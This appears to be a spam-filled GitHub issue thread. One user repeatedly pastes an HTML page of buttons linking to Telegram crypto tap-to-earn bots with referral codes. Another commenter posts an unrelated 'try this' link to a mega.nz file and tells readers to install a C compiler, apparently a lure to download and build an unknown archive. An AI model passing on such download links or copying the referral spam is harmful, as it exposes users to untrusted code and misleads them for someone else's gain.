### ISSUE TITLE
W

### ISSUE THREAD

**Issue by Mostafa7354** [ddddddeon/a#8]
<!DOCTYPE html>
<html lang="fa">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>صفحه با کلیدهای لینک</title>
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
    <style>
        body {
            background-color: #f0f0f5;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .button-container {
            display: flex;
            flex-direction: column;
            gap: 12px;
            max-width: 400px;
            margin: auto;
            padding: 20px;
            border: 1px solid #ddd;
            border-radius: 10px;
            background-color: #ffffff;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }

        .button {
            display: flex;
            align-items: center;
            gap: 10px;
            padding: 12px 20px;
            border: none;
            border-radius: 5px;
            color: white;
            cursor: pointer;
            font-size: 16px;
            transition: transform 0.3s, box-shadow 0.3s;
        }

        .button:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.2);
        }

        /* Colors for buttons */
        .button:nth-child(1) { background-color: #ff6f61; }
        .button:nth-child(2) { background-color: #6b5b95; }
        .button:nth-child(3) { background-color: #88b04b; }
        .button:nth-child(4) { background-color: #f7cac9; }
        .button:nth-child(5) { background-color: #92a8d1; }
        .button:nth-child(6) { background-color: #955251; }
        .button:nth-child(7) { background-color: #b565a7; }
        .button:nth-child(8) { background-color: #009b77; }
        .button:nth-child(9) { background-color: #dd4124; }
        .button:nth-child(10) { background-color: #d65076; }
        .button:nth-child(11) { background-color: #45b8ac; }
        .button:nth-child(12) { background-color: #e15d44; }
    </style>
</head>
<body>

<div class="button-container">
    <button class="button" onclick="window.location.href='https://t.me/major/start?startapp=81568545'">
        <i class="fas fa-shield-alt"></i> major
    </button>
    <button class="button" onclick="window.location.href='https://t.me/Pandas_HouseBot?start=81568545'">
        <i class="fas fa-paw"></i> Pandas_House
    </button>
    <button class="button" onclick="window.location.href='https://t.me/blum/app?startapp=ref_OJ8qHpjGEe'">
        <i class="fas fa-leaf"></i> blum
    </button>
    <button class="button" onclick="window.location.href='https://t.me/empirebot/game?startapp=hero81568545'">
        <i class="fas fa-dungeon"></i> xempire
    </button>
    <button class="button" onclick="window.location.href='http://t.me/catsgang_bot/join?startapp=sUlY2OL0jFCqmegY01uJp'">
        <i class="fas fa-cat"></i> cats
    </button>
    <button class="button" onclick="window.location.href='https://t.me/Agent301Bot/app?startapp=onetime81568545'">
        <i class="fas fa-user-secret"></i> Agent301
    </button>
    <button class="button" onclick="window.location.href='https://t.me/catizenbot/gameapp?startapp=r_841_10027847'">
        <i class="fas fa-city"></i> catizen
    </button>
    <button class="button" onclick="window.location.href='https://t.me/money_dogs_bot/money_dogs?startapp=WKZYnbrV'">
        <i class="fas fa-dog"></i> money_dogs
    </button>
    <button class="button" onclick="window.location.href='http://t.me/Tomarket_ai_bot/app?startapp=0000ohqX'">
        <i class="fas fa-shopping-cart"></i> Tomarket
    </button>
    <button class="button" onclick="window.location.href='https://t.me/realgoats_bot/run?startapp=15d668af-a45d-4a3c-805a-e49637e00d9a'">
        <i class="fas fa-goat"></i> realgoats
    </button>
    <button class="button" onclick="window.location.href='https://t.me/owlsonton_bot?start=81568545'">
        <i class="fas fa-owl"></i> owlsonton
    </button>
    <button class="button" onclick="window.location.href='https://t.me/PigshouseBot?start=81568545'">
        <i class="fas fa-piggy-bank"></i> Pigshouse
    </button>
</div>

</body>
</html>

**Comment by nourakhy** [comment]
try this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Mostafa7354** [comment]
<!DOCTYPE html>
<html lang="fa">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>صفحه با کلیدهای لینک</title>
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
    <style>
        body {
            background-color: #f0f0f5;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .button-container {
            display: flex;
            flex-direction: column;
            gap: 12px;
            max-width: 400px;
            margin: auto;
            padding: 20px;
            border: 1px solid #ddd;
            border-radius: 10px;
            background-color: #ffffff;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }

        .button {
            display: flex;
            align-items: center;
            gap: 10px;
            padding: 12px 20px;
            border: none;
            border-radius: 5px;
            color: white;
            cursor: pointer;
            font-size: 16px;
            transition: transform 0.3s, box-shadow 0.3s;
        }

        .button:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.2);
        }

        /* Colors for buttons */
        .button:nth-child(1) { background-color: #ff6f61; }
        .button:nth-child(2) { background-color: #6b5b95; }
        .button:nth-child(3) { background-color: #88b04b; }
        .button:nth-child(4) { background-color: #f7cac9; }
        .button:nth-child(5) { background-color: #92a8d1; }
        .button:nth-child(6) { background-color: #955251; }
        .button:nth-child(7) { background-color: #b565a7; }
        .button:nth-child(8) { background-color: #009b77; }
        .button:nth-child(9) { background-color: #dd4124; }
        .button:nth-child(10) { background-color: #d65076; }
        .button:nth-child(11) { background-color: #45b8ac; }
        .button:nth-child(12) { background-color: #e15d44; }
    </style>
</head>
<body>

<div class="button-container">
    <button class="button" onclick="window.location.href='https://t.me/major/start?startapp=81568545'">
        <i class="fas fa-shield-alt"></i> major
    </button>
    <button class="button" onclick="window.location.href='https://t.me/Pandas_HouseBot?start=81568545'">
        <i class="fas fa-paw"></i> Pandas_House
    </button>
    <button class="button" onclick="window.location.href='https://t.me/blum/app?startapp=ref_OJ8qHpjGEe'">
        <i class="fas fa-leaf"></i> blum
    </button>
    <button class="button" onclick="window.location.href='https://t.me/empirebot/game?startapp=hero81568545'">
        <i class="fas fa-dungeon"></i> xempire
    </button>
    <button class="button" onclick="window.location.href='http://t.me/catsgang_bot/join?startapp=sUlY2OL0jFCqmegY01uJp'">
        <i class="fas fa-cat"></i> cats
    </button>
    <button class="button" onclick="window.location.href='https://t.me/Agent301Bot/app?startapp=onetime81568545'">
        <i class="fas fa-user-secret"></i> Agent301
    </button>
    <button class="button" onclick="window.location.href='https://t.me/catizenbot/gameapp?startapp=r_841_10027847'">
        <i class="fas fa-city"></i> catizen
    </button>
    <button class="button" onclick="window.location.href='https://t.me/money_dogs_bot/money_dogs?startapp=WKZYnbrV'">
        <i class="fas fa-dog"></i> money_dogs
    </button>
    <button class="button" onclick="window.location.href='http://t.me/Tomarket_ai_bot/app?startapp=0000ohqX'">
        <i class="fas fa-shopping-cart"></i> Tomarket
    </button>
    <button class="button" onclick="window.location.href='https://t.me/realgoats_bot/run?startapp=15d668af-a45d-4a3c-805a-e49637e00d9a'">
        <i class="fas fa-goat"></i> realgoats
    </button>
    <button class="button" onclick="window.location.href='https://t.me/owlsonton_bot?start=81568545'">
        <i class="fas fa-owl"></i> owlsonton
    </button>
    <button class="button" onclick="window.location.href='https://t.me/PigshouseBot?start=81568545'">
        <i class="fas fa-piggy-bank"></i> Pigshouse
    </button>
</div>

</body>
</html>

**Comment by Mostafa7354** [comment]
<!DOCTYPE html>
<html lang="fa">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>صفحه با کلیدهای لینک</title>
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
    <style>
        body {
            background-color: #f0f0f5;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .button-container {
            display: flex;
            flex-direction: column;
            gap: 12px;
            max-width: 400px;
            margin: auto;
            padding: 20px;
            border: 1px solid #ddd;
            border-radius: 10px;
            background-color: #ffffff;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }

        .button {
            display: flex;
            align-items: center;
            gap: 10px;
            padding: 12px 20px;
            border: none;
            border-radius: 5px;
            color: white;
            cursor: pointer;
            font-size: 16px;
            transition: transform 0.3s, box-shadow 0.3s;
        }

        .button:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.2);
        }

        /* Colors for buttons */
        .button:nth-child(1) { background-color: #ff6f61; }
        .button:nth-child(2) { background-color: #6b5b95; }
        .button:nth-child(3) { background-color: #88b04b; }
        .button:nth-child(4) { background-color: #f7cac9; }
        .button:nth-child(5) { background-color: #92a8d1; }
        .button:nth-child(6) { background-color: #955251; }
        .button:nth-child(7) { background-color: #b565a7; }
        .button:nth-child(8) { background-color: #009b77; }
        .button:nth-child(9) { background-color: #dd4124; }
        .button:nth-child(10) { background-color: #d65076; }
        .button:nth-child(11) { background-color: #45b8ac; }
        .button:nth-child(12) { background-color: #e15d44; }
    </style>
</head>
<body>

<div class="button-container">
    <button class="button" onclick="window.location.href='https://t.me/major/start?startapp=81568545'">
        <i class="fas fa-shield-alt"></i> major
    </button>
    <button class="button" onclick="window.location.href='https://t.me/Pandas_HouseBot?start=81568545'">
        <i class="fas fa-paw"></i> Pandas_House
    </button>
    <button class="button" onclick="window.location.href='https://t.me/blum/app?startapp=ref_OJ8qHpjGEe'">
        <i class="fas fa-leaf"></i> blum
    </button>
    <button class="button" onclick="window.location.href='https://t.me/empirebot/game?startapp=hero81568545'">
        <i class="fas fa-dungeon"></i> xempire
    </button>
    <button class="button" onclick="window.location.href='http://t.me/catsgang_bot/join?startapp=sUlY2OL0jFCqmegY01uJp'">
        <i class="fas fa-cat"></i> cats
    </button>
    <button class="button" onclick="window.location.href='https://t.me/Agent301Bot/app?startapp=onetime81568545'">
        <i class="fas fa-user-secret"></i> Agent301
    </button>
    <button class="button" onclick="window.location.href='https://t.me/catizenbot/gameapp?startapp=r_841_10027847'">
        <i class="fas fa-city"></i> catizen
    </button>
    <button class="button" onclick="window.location.href='https://t.me/money_dogs_bot/money_dogs?startapp=WKZYnbrV'">
        <i class="fas fa-dog"></i> money_dogs
    </button>
    <button class="button" onclick="window.location.href='http://t.me/Tomarket_ai_bot/app?startapp=0000ohqX'">
        <i class="fas fa-shopping-cart"></i> Tomarket
    </button>
    <button class="button" onclick="window.location.href='https://t.me/realgoats_bot/run?startapp=15d668af-a45d-4a3c-805a-e49637e00d9a'">
        <i class="fas fa-goat"></i> realgoats
    </button>
    <button class="button" onclick="window.location.href='https://t.me/owlsonton_bot?start=81568545'">
        <i class="fas fa-owl"></i> owlsonton
    </button>
    <button class="button" onclick="window.location.href='https://t.me/PigshouseBot?start=81568545'">
        <i class="fas fa-piggy-bank"></i> Pigshouse
    </button>
</div>

</body>
</html><!DOCTYPE html>
<html lang="fa">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>صفحه با کلیدهای لینک</title>
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
    <style>
        body {
            background-color: #f0f0f5;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .button-container {
            display: flex;
            flex-direction: column;
            gap: 12px;
            max-width: 400px;
            margin: auto;
            padding: 20px;
            border: 1px solid #ddd;
            border-radius: 10px;
            background-color: #ffffff;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }

        .button {
            display: flex;
            align-items: center;
            gap: 10px;
            padding: 12px 20px;
            border: none;
            border-radius: 5px;
            color: white;
            cursor: pointer;
            font-size: 16px;
            transition: transform 0.3s, box-shadow 0.3s;
        }

        .button:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.2);
        }

        /* Colors for buttons */
        .button:nth-child(1) { background-color: #ff6f61; }
        .button:nth-child(2) { background-color: #6b5b95; }
        .button:nth-child(3) { background-color: #88b04b; }
        .button:nth-child(4) { background-color: #f7cac9; }
        .button:nth-child(5) { background-color: #92a8d1; }
        .button:nth-child(6) { background-color: #955251; }
        .button:nth-child(7) { background-color: #b565a7; }
        .button:nth-child(8) { background-color: #009b77; }
        .button:nth-child(9) { background-color: #dd4124; }
        .button:nth-child(10) { background-color: #d65076; }
        .button:nth-child(11) { background-color: #45b8ac; }
        .button:nth-child(12) { background-color: #e15d44; }
    </style>
</head>
<body>

<div class="button-container">
    <button class="button" onclick="window.location.href='https://t.me/major/start?startapp=81568545'">
        <i class="fas fa-shield-alt"></i> major
    </button>
    <button class="button" onclick="window.location.href='https://t.me/Pandas_HouseBot?start=81568545'">
        <i class="fas fa-paw"></i> Pandas_House
    </button>
    <button class="button" onclick="window.location.href='https://t.me/blum/app?startapp=ref_OJ8qHpjGEe'">
        <i class="fas fa-leaf"></i> blum
    </button>
    <button class="button" onclick="window.location.href='https://t.me/empirebot/game?startapp=hero81568545'">
        <i class="fas fa-dungeon"></i> xempire
    </button>
    <button class="button" onclick="window.location.href='http://t.me/catsgang_bot/join?startapp=sUlY2OL0jFCqmegY01uJp'">
        <i class="fas fa-cat"></i> cats
    </button>
    <button class="button" onclick="window.location.href='https://t.me/Agent301Bot/app?startapp=onetime81568545'">
        <i class="fas fa-user-secret"></i> Agent301
    </button>
    <button class="button" onclick="window.location.href='https://t.me/catizenbot/gameapp?startapp=r_841_10027847'">
        <i class="fas fa-city"></i> catizen
    </button>
    <button class="button" onclick="window.location.href='https://t.me/money_dogs_bot/money_dogs?startapp=WKZYnbrV'">
        <i class="fas fa-dog"></i> money_dogs
    </button>
    <button class="button" onclick="window.location.href='http://t.me/Tomarket_ai_bot/app?startapp=0000ohqX'">
        <i class="fas fa-shopping-cart"></i> Tomarket
    </button>
    <button class="button" onclick="window.location.href='https://t.me/realgoats_bot/run?startapp=15d668af-a45d-4a3c-805a-e49637e00d9a'">
        <i class="fas fa-goat"></i> realgoats
    </button>
    <button class="button" onclick="window.location.href='https://t.me/owlsonton_bot?start=81568545'">
        <i class="fas fa-owl"></i> owlsonton
    </button>
    <button class="button" onclick="window.location.href='https://t.me/PigshouseBot?start=81568545'">
        <i class="fas fa-piggy-bank"></i> Pigshouse
    </button>
</div>

</body>
</html>
